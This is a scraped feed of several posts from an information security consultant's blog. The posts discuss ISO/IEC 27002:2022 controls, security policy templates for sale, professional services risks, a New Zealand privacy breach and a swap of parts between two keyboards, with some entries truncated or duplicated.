fields over several decades. Notice that it is rational, systematic and repeatable.Here's a similar grossly-simplified outline of the classical experimental method that has proven equally successful over several centuries of scientific endeavour:Consider available informationPropose a testable hypothesisTest it (design and run experiments)Watch what happensDiscover and learnGOTO 1Either way, I'm a committed fan. The iterative approach with incremental improvements, works well. I approve.Along the way, aside from pushing back the frontiers of science and technology and achieving remarkable advances for human society, we've also learned about the drawbacks and flaws in the processes, and we've developed assorted mechanisms to reduce the risks and increase our chances of success e.g.: Key to 'improving' or 'advancing' is to be able to recognise and ideally measure the improvement or advance - in most cases anyway. Improvements or advances that happen purely by chance ('discoveries') are welcome but rare treats. A big issue in quality assurance is the recognition that there are usually several competing and sometimes contradictory requirements/expectations, not least the definition of 'quality'. For certain customers, a rusty old heap of a car discovered in a barn is just as much the 'quality vehicle' as a Rolls Royce to its customers. Likewise, security improvements depend on one's persp]]> 2022-05-26T14:13:08+00:00 http://blog.noticebored.com/2022/05/iterative-scientific-infosec.html www.secnews.physaphae.fr/article.php?IdArticle=4813037 False Patching None None NoticeBored - Experienced IT Security professional We have just completed and released another topic-specific information security policy template, covering responsible disclosure (of vulnerabilities, mostly).The policy encourages people to report any vulnerabilities or other information security issues they discover with the organisation's IT systems, networks, processes and people. Management undertakes to investigate and address reports using a risk-based approach, reducing the time and effort required for spurious or trivial issues, while ensuring that more significant matters are prioritised. The policy distinguishes authorised from unauthorised security testing, and touches on ethical aspects such as hacking and premature disclosure.It allows for reports to be made or escalated to Internal Audit, acting as a trustworthy, independent function, competent to undertake investigations dispassionately. This is a relief-valve for potentially sensitive or troublesome reports where the reporter is dubious of receiving fair, prompt treatment through the normal reporting mechanism - for instance, reporting on peers or managers.It is primarily intended as an internal/corporate security policy applicable to workers ... but can be used as the basis for something to be published on your website, aimed at 'security researchers' and ethical hackers out there. There are notes about this at the end of the template. To be honest, there are plenty of free examples on the web but few if any are policies covering vulnerability disclosure by workers.All that in just 3 pages, available as an MS Word document for $20 from SecAware.com.I am working on another 2 new topic-specific policies as and when I get the time. Paradoxically, it takes me longer to prepare succcinct policy templates than, say, guidelines or awareness briefings. I have to condense the topic down to its essentials without neglecting anything important. After a fair bit of research and thinking about what those essentials are, the actual drafting is fairly quick, despite the formalities. Preparing new product pages and uploading the templates plus product images then takes a while, especially for policies that relate to several others in the suite - which most do these days as the SecAware policy suite has expanded and matured. As far as I know, SecAware has the broadest coverage of any info/cybersec policy suite on the market.... Talking of which, I plan to package all the topic-specific policies together as a bulk deal before long. Having written them all, I know the suite is internally consistent in terms of the writing style, formatting, approach, coverage and level. It's also externally consistent in the sense of incorporating good security practices from the ISO27k and other standards.]]> 2022-05-21T15:49:50+00:00 http://blog.noticebored.com/2022/05/responsible-disclosure-another-new.html www.secnews.physaphae.fr/article.php?IdArticle=4726486 False Vulnerability None None NoticeBored - Experienced IT Security professional In its infinite wisdom, Microsoft designed data encryption into the Sculpt wireless keyboard set to protect against wireless eavesdropping and other attacks. The keyboard allegedly* uses AES for symmetric encryption with a secret key burnt into the chips in the keyboard's very low power radio transmitter and the matching USB dongle receiver during manufacture: they are permanently paired together. The matching Sculpt mouse and Sculpt numeric keypad use the same dongle and both are presumably keyed and paired in the same way as the keyboard.This design is more secure but less convenient than, say, Bluetooth pairing. The risk of hackers intercepting and successfully decoding my keypresses wirelessly is effectively zero. Nice! Unfortunately, the keyboard, keypad and mouse are all utterly dependent on the corresponding USB dongle, creating an availability issue. Being RF-based, RF jamming would be another availability threat. Furthermore, I'm still vulnerable to upstream and downstream hacking - upstream meaning someone coercing or fooling me into particular activities such as typing-in specific character sequences (perhaps cribs for cryptanalysis), and downstream including phishers, keyloggers and other malware with access to the decrypted key codes etc.So yesterday, after many, many happy hours of use, my Sculpt's unreliable Ctrl key and worn-out wrist rest finally got to me. I found another good-as-new Sculpt keyboard in the junkpile, but it was missing its critical USB dongle. The solution was to open up both keyboards and swap the coded transmitter from the old to the new keyboard - a simple 20 minute hardware hack.In case I ever need to do it again, or for anyone else in the same situation, here are the detailed instructions:Assemble the tools required: a small cross-head screwdriver; a stainless steel dental pick or small flat-head screwdriver; a plastic spudger or larger flat-head screwdriver (optional); a strong magnet (optional). Start with the old keyboard. Peel off the 5 rubber feet under the keyboard, revealing 5 small screws. Set the feet aside to reapply later.Remove all 5 screws. Note: the 3 screws under the wrist rest are slightly longer than the others, so keep them separate.Carefully ease the wrist rest away from the base. It is a 'snap-fit' piece. I found I could lever it off using my thumbs at the left or right sides, then gradually work around the edge releasing it. You may prefer to use the spudger. It will flex a fair bit but it is surprisingly strong.Under the wrist rest are anot]]> 2022-05-18T15:41:53+00:00 http://blog.noticebored.com/2022/05/hacking-microsoft-sculpt-keyboard.html www.secnews.physaphae.fr/article.php?IdArticle=4679401 False Malware,Tool None None NoticeBored - Experienced IT Security professional  The 'obvious' driver for information security is information risk: valuable yet vulnerable information must be secured/protected against anything that might compromise its confidentiality, integrity or availability, right? Given an infinite array of possible risks and finite resources to address them, information risk analysis and management techniques help us scan the risk landscape for things that stand out - the peaks - and so we play whack-a-mole, attempting to level the field through mitigating controls, remainingly constantly on the lookout for erupting peaks and those hidden behind the ones we can see or were otherwise transparent.That's 'obvious' from my perspective as an experienced information risk and security professional, anyway. Your perspective probably differs. You may look at things from a slightly or dramatically different angle - and that's fine. I see these as interesting and stimulating complementary approaches, not alternatives.Compliance, for instance, is a strong driver in some cultures and organisations. Quality, efficiency and effectiveness drive others. Some seek to apply good practices, joining the pack. Customer-centric businesses naturally focus on customer satisfaction, brand values, loyalty etc. Startups are concerned to grow rapidly, hence anything that is or might become a barrier is a target. Government organisations, charities, professional services organisations, utilities, schools, assorted industries etc. all have their own focal points and concerns. Profits are clearly important for commercial organisations, but there are other financial measures too - and indeed many other things to measure. Information risk and security is incidental or supportive for most of them, enabling for some and essential for a select few whose business is information security, or the enlightened (as I like to call them).So, in your own situation,  consider the business perspective. What does management want/expect out of information security? Along with what they do not want or expect to avoid, these are worthwhile aspects to explore.]]> 2022-05-15T17:18:34+00:00 http://blog.noticebored.com/2022/05/what-actually-drives-information.html www.secnews.physaphae.fr/article.php?IdArticle=4628847 False None None None NoticeBored - Experienced IT Security professional In relation to professional services, management responsibilities are shared between client and provider, except where their interests and concerns diverge. Identifying and exploiting common interests goes beyond the commercial/financial arrangements, involving different levels and types of management:Strategic management: whereas some professional services may be seen as short-term point solutions to specific issues ("temping"), many have longer-term implications such as the prospect of repeat/future business if things work out so well that the engagement is clearly productive and beneficial to both parties. Establishing semi-permanent insourcing and outsourcing arrangements can involve substantial investments and risks with strategic implications, hence senior management should be involved in considering and deciding between various options, designing and instituting the appropriate governance and management arrangements, clarifying responsibilities and accountabilities etc. Organisations usually have several professional services suppliers and/or clients. Aside from managing individual relationships, the portfolio as a whole can be managed, perhaps exploiting synergistic business opportunities (e.g. existing suppliers offering additional professional services, or serving other parts of the client organisation or its business partners). Tactical and operational management: planning, conducting, monitoring and overseeing assignments within a professional services engagement obviously involves collaboration between client and provider, but may also affect and be affected by the remainder of their business activities. A simple example is the provision and direction of the people assigned to assignments, perhaps determining their priorities relative to other work obligations. If either party's management or workforce becomes overloaded or is distracted by other business, the other may need to help out and perhaps take the lead in order to meet agreed objectives - classic teamwork.Commercial management: negotiating and entering into binding contracts or agreements can be a risky process. Getting the best value out of the arrangements includes not just the mechanics of invoicing and settling the bills accurately and on time, but getting the most out of all the associated resources, including the information content.  Relationship management: anyone over the age of ten will surely appreciate that relationships are tough! There are just so many dimensions to this, so much complexity and dynamics. In respect of professional services, there are both organisational and personal relationships to manage, while 'manage' is more about guiding, monitoring and reacting than directing and controlling. Despite the formalities of laws, contracts and policies, relationships seemingly play by their o]]> 2022-05-14T17:22:46+00:00 http://blog.noticebored.com/2022/05/managing-professional-services.html www.secnews.physaphae.fr/article.php?IdArticle=4603514 False Guideline None None NoticeBored - Experienced IT Security professional According to a Radio New Zealand news report today:"Hackers have taken names, addresses, contact details and expired credit card numbers from the AA Traveller website used between 2003 and 2018. AA travel and tourism general manager Greg Leighton said the data was taken in August last year and AA Traveller found out in March. He said a lot of the data was not needed anymore, so it should have been deleted, and the breach "could have been prevented"."The disclosure prompted the acting NZ Privacy Commissioner to opine that companies 'need a review policy':"Acting Privacy Commisioner Liz Macpherson told Midday Report that if data was not needed it should be deleted ... Companies needed a review policy in place to determine if the data stored was neccessary, or could be deleted, Macpherson said."So I've looked through our SecAware information security policies to see whether we have it covered already, and sure enough we do - well, sort-of. Our privacy compliance policy template says, in part:"IT systems, cloud services and business processes must comply fully with applicable privacy laws throughout the entire development lifecycle from initial specification though testing, release, operation, management and change, to final retirement.  For example, genuine (as opposed to synthetic) personal information used during the development process (e.g. for testing) must be secured just as strongly as in production, and securely erased when no longer required."The final clause in that paragraph refers to 'secure erasure' without specifying what that really means, and 'when no longer required' is just as vague as determining whether the data remains 'necessary'. That said, the remainder of the paragraph, and in fact the rest of the policy template, covers other relevant and equally important issues - including compliance with applicable p]]> 2022-05-11T18:51:20+00:00 http://blog.noticebored.com/2022/05/aa-privacy-breach-policy-update.html www.secnews.physaphae.fr/article.php?IdArticle=4576358 False None None 3.0000000000000000 NoticeBored - Experienced IT Security professional 2022-05-11T10:30:05+00:00 http://blog.noticebored.com/2022/05/how-many-metrics.html www.secnews.physaphae.fr/article.php?IdArticle=4575064 False Guideline None 3.0000000000000000 NoticeBored - Experienced IT Security professional  I finally found the time today to complete and publish an information security policy template on threat intelligence. The policy supports the new control in ISO/IEC 27002:2022 clause 5.7: "Information relating to information security threats should be collected and analysed to produce threat intelligence."The SecAware policy template goes a little further: rather than merely collecting and analysing threat intelligence, the organisation should ideally respond to threats - for example, avoiding or mitigating them. That, in turn, emphasises the value of 'actionable intelligence', in the same way that 'actionable security metrics' are worth more than 'coffee table'/'nice to know' metrics that are of no practical use. The point is that information quality is more important that its volume. This is an information integrity issue, as much as information availability.The policy also mentions 'current and emerging threats'. This is a very tricky area because novel threats are generally obscure and often deliberately concealed in order to catch out the unwary. Maintaining vigilance for the early signs of new threat actors and attack methods is something that distinguishes competent, switched-on security analysts from, say, journalists.The policy template costs just $20 from www.SecAware.com. I'll be slaving away on other new policies this week, plugging a few remaining gaps in our policy suite - and I'll probably blog about that in due course.]]> 2022-05-11T09:25:05+00:00 http://blog.noticebored.com/2022/05/threat-intelligence-policy.html www.secnews.physaphae.fr/article.php?IdArticle=4593755 True Threat None None NoticeBored - Experienced IT Security professional Last evening I completed and published another SecAware infosec policy template addressing ISO/IEC 27002:2022 clause 8.11 "Data masking":"Data masking should be used in accordance with the organization's topic-specific policy on access control and other related topic-specific, and business requirements, taking applicable legislation into consideration."The techniques for masking or redacting highly sensitive information from electronic and physical documents may appear quite straightforward. However, experience tells us the controls are error-prone and fragile: they generally fail-insecure, meaning that sensitive information is liable to be disclosed inappropriately. That. in turn, often leads to embarrassing and costly incidents with the possibility of prosecution and penalties for the organisation at fault, along with reputational damage and brand devaluation.The policy therefore takes a risk-based approach, outlining a range of masking and redaction controls but recommending advice from competent specialists, particularly if the risks are significant.The $20 policy template is available here.Being a brand new policy, it hasn't yet had the benefit of the regular reviews and updates that our more mature policies enjoy ... so, if you spot issues or improvement opportunities, please get in touch.As usual, I have masked/redacted the remainder of the policy for this blog and on SecAware.com by making an image of just the first half page or so, about one eigth of the document by size but closer to one quarter of the policy's information value. So I'm giving you about $5's worth of information, maybe $4 since the extract is just an image rather than an editable document. On that basis, similar partial images of the 80-odd security policy templates offered through SecAware.com are worth around $320 in total. It's an investment, though, a way to demonstrate the breadth, quality, style and utility of our products and so convince potential buyers like you to invest in them.  ]]> 2022-05-11T09:24:18+00:00 http://blog.noticebored.com/2022/05/data-masking-and-redaction-policy.html www.secnews.physaphae.fr/article.php?IdArticle=4574987 False Guideline None None NoticeBored - Experienced IT Security professional  I finally found the time today to complete and publish an information security policy template on threat intelligence. The policy supports the new control in ISO/IEC 27002:2022 clause 5.7: "Information relating to information security threats should be collected and analysed to produce threat intelligence."The SecAware policy goes a little further: rather than merely collecting and analysing threat intelligence, the organisation should ideally respond to threats - for example, avoiding or mitigating them. That, in turn, emphasises the value of 'actionable intelligence', in the same way that 'actionable security metrics' are worth more than 'coffee table'/'nice to know' metrics that are of no practical use. The point is that information quality is more important that its volume. This is an information integrity issue, as much as information availability.The policy also mentions 'current and emerging threats'. This is a very tricky area because novel threats are generally obscure and often deliberately concealed in order to catch out the unwary. Maintaining vigilance for the early signs of new threat actors and attack methods is something that distinguishes competent, switched-on security analysts from, say, journalists.The policy template costs just $20 from www.SecAware.com. I'll be slaving away on other new policies this week, plugging a few remaining gaps in our policy suite - and I'll probably blog about that in due course.]]> 2022-05-10T16:37:36+00:00 http://blog.noticebored.com/2022/05/threat-intelligence-policy.html www.secnews.physaphae.fr/article.php?IdArticle=4571129 False Threat None 3.0000000000000000 NoticeBored - Experienced IT Security professional Having introduced this blog series and covered information risks applicable to the preliminary and operational phases of a professional services engagement, it's time to cover the third and final phase when the engagement and business relationship comes to an end.Eventually, all relationships draw to a close. Professional services clients and providers go their separate ways, hopefully parting on good terms unless there were unresolved disagreements, issues or incidents (hinting at some information risks).It is worth considering what will/might happen at the end of a professional services engagement as early as the preliminary pre-contract phase. Some of the controls need to be predetermined and pre-agreed in order to avoid or mitigate potentially serious risks later-on. Straightforward in principle ... and yet easily neglected in the heady rush of getting the engagement going. This is not unlike a couple drawing up their "pre-nup" before a wedding, or a sensible organisation making suitable business continuity arrangements in case of severe incidents or disasters ahead. A potentially significant information risk in the concluding phase stems from the inappropriate retention by either party of [access to] confidential information obtained or generated in the course of the engagement - whether commercially sensitive or personal information. Imagine the implications of, say, a law firm being hit by a ransomware attack, office burglary or insider incident, giving miscreants access to its inadequately-secured client casework files and archives. Meta-information about the engagement, assignment/s and contracts may also be commercially-sensitive, for instance if the supplier deliberately under-priced the contract to secure the business and gain a foothold in the market, only to find it uneconomic to deliver the contracted services - a decidedly embarrassing situation if disclosed.Information risks in this phase are amplified if the relationship e]]> 2022-04-24T12:23:00+00:00 http://blog.noticebored.com/2022/04/professional-services-concluding-phase.html www.secnews.physaphae.fr/article.php?IdArticle=4499057 False Ransomware,Guideline None None NoticeBored - Experienced IT Security professional ISO/IEC 27002:2022 is another potential nightmare for the naïve and inexperienced policy author.  Policy scoping Despite the context and presumed intent, the title of the standard's policy example ("secure development") doesn't explicitly refer to software or IT. Lots of things get developed - new products for instance, business relationships, people, corporate structures and so on. Yes, even security policies get developed! Most if not all developments involve information (requirements/objectives, specifications, plans, status/progress reports etc.) and hence information risks ... so the policy could cover those aspects, ballooning in scope from what was presumably intended when the standard was drafted.Even if the scope of the policy is constrained to the IT context, the information security controls potentially required in, say, software development are many and varied, just as the development and associated methods are many and varied, and more poignantly so too are the information risks.  Policy development Your homework challenge, today, is to consider, compare and contrast these five markedly different IT development scenarios:Commercial firmware being developed for a small smart actuator/sensor device (a thing) destined to be physically embedded in the pneumatic braking system of commercial vehicles such as trucks and coaches, by a specialist OEM supplier selected on the basis of lowest price. A long-overdue technical update and refresh for a German bank's mature financial management application, developed over a decade ago by a team of contractors long since dispersed or retired, based on an obsolete database, with fragmentary documentation in broken English and substantial compliance implications, being conducted by a large software house based entirely in India. A cloud-based TV program scheduling system for a global broadcaster, to be delivered iteratively over the next two years by a small team of contractors under the management of a consultancy firm for a client that freely admits it barely understands phase 1 and essentially has no idea what might be required next, or when.A departmental spreadsheet for time recording by home workers, so their time can be tracked and recharged to clients, and their productivity can be monitored by management.Custom hardware, firmware and autonomous software required for a scientific exploration of the Marianas trench - to be deployed in the only two deep-sea drones in existence that are physically capable of delivering and recovering the payload at the extreme depths required.You may have worked in or with projects/initiatives vaguely similar to one, maybe even two or three of these, but probably not all five - and th]]> 2022-04-23T18:06:15+00:00 http://blog.noticebored.com/2021/10/topic-specific-example-1111-secure.html www.secnews.physaphae.fr/article.php?IdArticle=4497069 False Patching,Guideline None None NoticeBored - Experienced IT Security professional ISO/IEC 27002:2022, "management of technical vulnerabilities" is the kind of phrase that speaks volumes to [some, switched-on, security-aware] IT pro's ... and leaves ord'nry folk perplexed, befuddled and nonplussed. In this case, that may be appropriate if it aligns with the intended audience for the policy, perhaps not if the policy needs to be read, understood and complied with by, say, workers in general, for whom "Patching" is arguably a more apt and widely-known term.So, do you need to tell workers to keep their IT systems, smartphones and IoT things up to date with security patches? If so, before launching into the policy development process, think very carefully about the title, content and style of your policy - plus the associated procedures, guidelines, awareness and training materials, help-desk scripts or whatever you decide is necessary to achieve your information risk management objectives in this regard (more on that below).Hinson tip: what are your information risk management objectives in this regard (concerning 'technical vulnerabilities' ... or whatever aspect/s you believe need addressing)? What information risks are you facing, how significant are they (relative to other things on your plate) and how do you intend to treat them? Seriously, think about it. Talk it through with your peers and professional colleagues. Draft a cunning treatment plan for this particular subset of information risks, discuss it with management and refine it. Lather, rinse, repeat until you achieve consensus (or wear down the blockers and negotiate a fragile settlement), and finally you are primed to craft your policy.Once more, we have your starter-for-ten, a generic patching policy template designed to help get you smartly off the starting blocks:While we don't presently offer a policy template on vulnerability disclosures (something worth adding to our to-do list, maybe?), we do have others that are to some extent relevant to this topic, for instance on change and configuration management and information systems security. I'll pick up on that point at the end of this blog series.Aside f]]> 2022-04-23T18:05:53+00:00 http://blog.noticebored.com/2021/10/topic-specific-example-1011-management.html www.secnews.physaphae.fr/article.php?IdArticle=4497070 False Vulnerability None None NoticeBored - Experienced IT Security professional Following-on from the preliminary phase I covered yesterday, the longest phase of most professional services engagements is the part where the services are delivered. With the contractual formalities out of the way, the supplier starts the service, providing consultancy support or specialist advice. The client receives and utilises the service. Both 'sides' are important to both parties, since a professional service that isn't delivered and used doesn't generate value for the client, and is unlikely to lead to repeat business - such as additonal assignments:Deliberately taking a simplistic view once again, I have represented 'assignments' (which may be projects, jobs, tasks or whatever) as discrete pieces of work, each with a beginning, middle and end:  Things are never so neat and tidy in practice. Some assignments may never really get off the ground, and some gradually diminish or peter out rather than coming to an abrupt end. On-again-off-again assignments are challenging to plan and resource. Assignments may blend into each other or split apart. If the same supplier resources (mostly people) are involved in multiple assignments, possibly for multiple clients, t]]> 2022-04-23T12:40:00+00:00 http://blog.noticebored.com/2022/04/professional-services-operational.html www.secnews.physaphae.fr/article.php?IdArticle=4496171 False Guideline None None NoticeBored - Experienced IT Security professional "Risk management procedures are fundamental processes to prepare organisations for a future cybersecurity attack, to evaluate products and services for their resistance to potential attacks before placing them on the market, and to prevent supply chain fraud" says ENISA in the report "RISK MANAGEMENT STANDARDS - Analysis of standardisation requirements in support of cybersecurity policy" published in March 2022. Not to be left behind, ENISA - originally the European Network and Information Security Agency (an official agency of the EU) - leapt aboard the cyber bandwagon, rebranding itself "The European Union Agency for Cybersecurity" when it became a permanent EU agency under the European Cybersecurity Act, regulation (EU) 2019/881. Despite the vague title, RISK MANAGEMENT STANDARDS in fact primarily concerns "risk management [and] security of ICT products, ICT services and ICT processes" where 'risk' means "any reasonably identifiable circumstance or event having a potential adverse effect on the security of network and information systems." Apparently, "The main goal of risk management is (in general) to protect ICT products (software, hardware, systems, components, services) and business assets, and minimise costs in cases of failures. Thus it represents a core duty for successful business or IT management." In other words, the ENISA document revolves around IT risks, primarily, although it does casually mention 'enterprise risk management' which takes in operational, market, supply chain, project, strategic and other risks. Unfortunately, I haven't dug deep enough yet to reveal actual defiinitions of key terms such as "cybersecurity" or "sector". Evidently, we are supposed to just know what they mean. It doesn't help that the cited "Methodology for Sectoral Cybersecurity Asssessments 2021" official download appears to be broken, but consulting another source I see that it doesn't even define those terms anyway. Furthermore, an embedded diagram suggests an unconventional interpretation of 'risk' and 'exposure', while 'threat' seemingly disregards unintentional and untargeted threats such as generic malware, accidents and storms: ]]> 2022-04-23T11:09:24+00:00 http://blog.noticebored.com/2022/04/eu-to-standardise-on-iso-31000-and.html www.secnews.physaphae.fr/article.php?IdArticle=4496047 False Guideline None None NoticeBored - Experienced IT Security professional a guideline on the information risk, security and privacy aspects of professional services. I introduced a simplistic 3-phase model for the business relationship through which one or more professional services assignments are delivered and consumed. Today, I'm exploring the preliminary phase.Before professional services are delivered, client and provider form a business relationship. They determine the professional services required and offered, and of course negotiate the commercial arrangements. They also have the opportunity to decide how the services are to be provided, and how both the assignment/s and the business relationship are to be managed.Contracting is an important control in its own right with significant information and commercial risks associated. The contract may for instance: Be inappropriate for either organisation, the relationship and/or the professional service/s; Be informal, undocumented, invalid and hence unenforceable;Bypass or shortcut due process;Be uneconomic for either party; Be unfair, biased and perhaps unethical;Lead to problems if an assignment fails or the whole relationship turns sour, perhaps as a result of an incident. Contracting is a chance for both organisations to think forward, discuss and agree the governance, management, compliance, security/privacy, control and assurance needed for the remainder of the professional services lifecycle (both phases!). It may be infeasible, later on, to modify the terms or specify additional requirements and the associated arrangements for integrity, confidentiality, incident management etc., especially if relationship issues arise.Also at this stage, client and provider conduct some form of due diligence checks on each other, exploring factors such as solvency, competence, qualifications, certifications and reputations. The manner in which both parties participate in this phase can be a valuable predictive indicator - a big clue as to how things are likely to pan out later e.g.:Appreciation of the each party's capabilities and concerns, plus their common interests in making a commercial success of the planned assignment/s and the business relationship as a whol]]> 2022-04-22T09:26:38+00:00 http://blog.noticebored.com/2022/04/professional-services-preliminaries.html www.secnews.physaphae.fr/article.php?IdArticle=4490303 False Vulnerability,Guideline None None NoticeBored - Experienced IT Security professional 2022-04-21T17:39:36+00:00 http://blog.noticebored.com/2022/04/information-risk-and-security-for.html www.secnews.physaphae.fr/article.php?IdArticle=4486142 False Guideline None None NoticeBored - Experienced IT Security professional  This week in an ISO27k Forum thread about selecting information security controls from ISO/IEC 27002, Ross told us "cost is always A factor, however more accurately, the "Cost-Benefit Ratio" may become a deciding factor. A general principle is that the cost of implementing a risk treatment should never exceed the value of the asset being protected. Determining the 'value' of the 'asset' might be tricky (eg. impact to brand value when considering consequential reputational risk), however someone within an organisation often has an existing view on this value."Clearly security controls should save more than they cost, hence in theory organisations should only invest in, operate and maintain controls that are valuable ... but in reality, value-based information risk and security management is far from straightforward.For starters, we have no choice with some controls: even in a greenfield situation such as a high-tech startup, the very act of designing and building the company depends on a raft of governance and managment controlsNext consider the costs. Controls have lifecycles incurring costs at every stage, starting even before we develop or procure them since someone has to determine the requirements, then specify and search for solutions, then implement and configure them. Once operational, there are costs associated with using controls, plus generally they need to be monitored, managed and maintained, and perhaps eventually retired or replaced. Being tricky to measure, it is tempting to ignore these costs, lumping them in with all the other costs of doing business ... which may explain the failure of some kinds of control. Complex controls require significant care and attention to keep them operating efficiently and effectively. Thirdly, consider the benefits. Information security controls rarely eliminate information risks: usually, the best we can hope for is partial mitigation - reducing the probability and/or impact of certain types of incident - and even that is uncertain without associated controls such as monitoring, compliance and assurance. What is the $ value of reducing information risks? If a given control had  not been selected and put into operation, how costly would any corresponding incidents]]> 2022-04-15T09:09:24+00:00 http://blog.noticebored.com/2022/04/value-based-infosec.html www.secnews.physaphae.fr/article.php?IdArticle=4451281 False Guideline None None NoticeBored - Experienced IT Security professional Normal 0 false false false EN-NZ X-NONE X-NONE MicrosoftInternetExplorer4 [if gte mso 9]> ]]> 2022-04-13T07:25:27+00:00 http://blog.noticebored.com/2022/04/domotics-can-o-worms.html www.secnews.physaphae.fr/article.php?IdArticle=4436829 False None None None NoticeBored - Experienced IT Security professional Yesterday, I completed and published the white paper on information security control attributes. Today I drafted a set of comments on ISO/IEC JTC 1/SC 27's proposed Preliminary Work Item for ISO/IEC 27028, using content from the white paper to build a 'donor document' with fairly minor changes in accordance with ISO's rquired structure and format. It includes the following summary: "This document extends the concept of 'control attributes' introduced in ISO/IEC 27002:2022, discussing a wider variety of factors potentially worth bearing in mind when considering, selecting, designing, using and reviewing information security controls. Control attributes are a powerful and flexible tool for information security management purposes, a novel way to design, manage and improve an organisation's approach to mitigating unacceptable information risks, supplementing more traditional or conventional methods. The document includes pragmatic suggestions on how to make use of control attributes in the business context, with a worked example illustrating the approach." Once the comments are submitted, we must wait patiently to see how much of it (if any!) makes it through to the Working Draft, blended with inputs and comments from other committee members. Although it seems to take 'forever' to develop new standards, I'm hoping that the donor document will set the project off to a flying start.Meanwhile, I'm actively looking for opportunities for clients to start using control attributes as an integral part of their ISO27k information risk and security management activities - designing better, more relevant and meaningful security metrics for instance.  If that or any other ideas in the paper catch your imagination, please comment below or email me (Gary@isect.com). I see a lot of potential business value in control attributes: how about you?]]> 2022-04-05T17:31:41+00:00 http://blog.noticebored.com/2022/04/infosec-control-attributes-paper.html www.secnews.physaphae.fr/article.php?IdArticle=4397299 False Tool None None NoticeBored - Experienced IT Security professional Despite the excellent work done to restructure and update the standard, I still feel some commonplace 'good practice' information security controls are either Missing In Action or inadequately covered by ISO/IEC 27002:2022, these nine for example:Business continuity controls, covering resilience, recovery and contingency aspects in general, not just in the IT security or IT domains. ISO 22301 is an excellent reference here, enabling organisations to identify, rationally evaluate and sensibly treat both high probability x low impact and low probability x high impact information risks (the orange zone on probability impact graphics), not just the obvious double-highs (the reds and flashing crimsons!). Therefore, '27002 could usefully introduce/summarise the approach and refer readers to '22301 and other sources for the details.Availability and integrity controls supporting/enabling the exploitation of high-quality, up-to-date, trustworthy business information and opportunities for legitimate purposes within the constraints of applicable policies, laws, regulations etc., even when this means deliberately taking chances (accepting risks!) to secure business opportunities. Also, I'd like to see, somewhere in the ISO27k series, clearer advice on how to tackle the trade-off between control and utility: information that is too tightly secured loses its value, just as it does if inadequately secured ... and that in turn leads to the idea of at least mentioning financial and general business controls relating to information risk and security (e.g. budgeting, project investments, resourcing, cost accounting, incident and impact costing, valuing intangible assets, directing and motivating specialists: these are all import but tricky areas, so advice would help improve the effectiveness and efficiency of information security). [Some of this is covered, albeit quite academically rather than pragmatically, in ISO/IEC 27014 and '27016, and outside the ISO27k realm.]Health and safety controls protecting 'our most valuable assets', providing a supportive work environment that is conducive to getting the most out of our people, and ensuring the safety of our customers using our products. As with business continuity, H&S is pretty well covered by other standards plus laws and regs ... although, arguably, there's much more left to say, yet, on mental health (e.g. the long-term adverse health effects of excessive stress, both on and off the job), with significant implications for information risks ]]> 2022-03-15T16:36:29+00:00 http://blog.noticebored.com/2022/03/the-nine-controls-isoiec-27002-missed.html www.secnews.physaphae.fr/article.php?IdArticle=4282237 False Guideline None None NoticeBored - Experienced IT Security professional Last Thursday, a member of the ISO27k Forum launched a new discussion thread with this poser (lightly edited):"Having recently become an ISMS coordinator, I must prepare a monthly report to management. How does one write an information security report?  What should be reported?" Over the weekend we've raised and debated a bunch of ideas, such as a tiered approach, starting at the detailed operational level with effectiveness metrics for the selected information security controls, then aggregating and summarising information for less frequent reports to higher management, emphasising the business perspective (e.g. reporting not just the number of incidents, but a breakdown by severity level mapping to business impacts for senior management). [if gte mso 9]> Normal 0 false false false EN-NZ X-NONE X-NONE MicrosoftInternetExplorer4 [if gte mso 9]> ]]> 2022-03-14T20:24:00+00:00 http://blog.noticebored.com/2022/03/information-risk-and-security.html www.secnews.physaphae.fr/article.php?IdArticle=4275467 False None None 3.0000000000000000 NoticeBored - Experienced IT Security professional Today I completed and published a 20-page white paper about 'control attributes', inspired by those used in ISO/IEC 27002:2022The concept behind the paper has been quietly brewing for a couple of months or more, taking the past few weeks to crystallise into words in a form that I'm happy to share publicly.In a nutshell, 'attributes' are characteristics or features that can be used to categorise, sort or rank information security controls by various criteria. That simplistic concept turns out to unlock some powerful possibilities, described pragmatically in the paper. It's a more innovative and valuable technique than it may appear.Along the way, I regret inadvertently upsetting the team of JTC 1/SC 27 editors working on ISO/IEC 27028 by sharing an incomplete draft with them in the hope it might become the basis of the initial draft of the new standard.  During a Zoom meeting. At 3:00am, NZ time. I wasn't at my best. Ooops.Anyway, now the paper is 'finished' and published, I'm hoping to prompt debate and insightful comments, gathering useful feedback and especially improvement suggestions from readers, leading in turn to a better document to submit (through the proper process, this time!) to the SC 27 project team. We may unfortunately have missed our opportunity to deliver a complete 'donor document' to use as the first working draft of the new standard but all is not lost. The paper's suggestions on how to use attributes will, I hope, make a substantial contribution to the second working draft, and in time inform the issued standard. It is published under a Creative Commons licence. Exposure, discussion and insightful comment is what I'm after so, in addition to this blog, I have notified the 4,500 members of the ISO27k Forum about the paper and released it to an unknown number of LinkeDinners.Care to join the gang? Download the paper here.Share and discuss it with your peers and colleagues.Rip it to shred]]> 2022-03-01T20:18:41+00:00 http://blog.noticebored.com/2022/03/infomation-security-control-attributes.html www.secnews.physaphae.fr/article.php?IdArticle=4206047 False Guideline None None NoticeBored - Experienced IT Security professional completely restructured ISO/IEC 27002:2022 has naturally prompted a rash of questions from anxious ISO27k users around the world about the implications for ISO/IEC 27001:2013, particularly on the certification aspects since '27002:2022 no longer aligns with '27001:2013 Annex A.The situation, today, is that ISO/IEC 27001:2013, plus the associated accreditation and certification processes, remain exactly as they were:Organisations that chose to adopt the standard are required to use Annex A of '27001:2013 to check that they have not accidentally neglected any relevant/necessary information security controls, documenting the associated justified decisions to include/exclude the controls in a Statement of Applicability.Accredited certification bodies are required to confirm that clients comply with the mandatory obligations in '27001:2013, including that SoA requirement among others, both during the initial certifications and any subsequent interim audits and re-certifications.In other words, it's business as usual ... but looking forward, there are of course changes afoot.A formal amendment to ISO/IEC 27001:2013 is currently being prepared:A draft of the amendment is already available through ISO if you can't wait for it to be finalised and released - which I understand is expected to happen in the next few months, possibly as late as August 2022 but hopefully sooner. The draft amendment essentially replaces Annex A with an equivalent that references and summarises the controls from ISO/IEC 27002:2022. It is likely to retain the succinct tabular format of the original Annex A, i.e. it will reference each control by its '27002:2022 clause number prefixed with "A." (for Annex A), then state the control's title, followed by a single sentence outlining the control. As before, it will not elaborate on that outline: readers should consult '27002 for the supporting explanation and implementation advice - typically half a page of detail per control - and/or look to other sources of guidance, of which there are many.There may also be minor wording changes in the main body clause about the 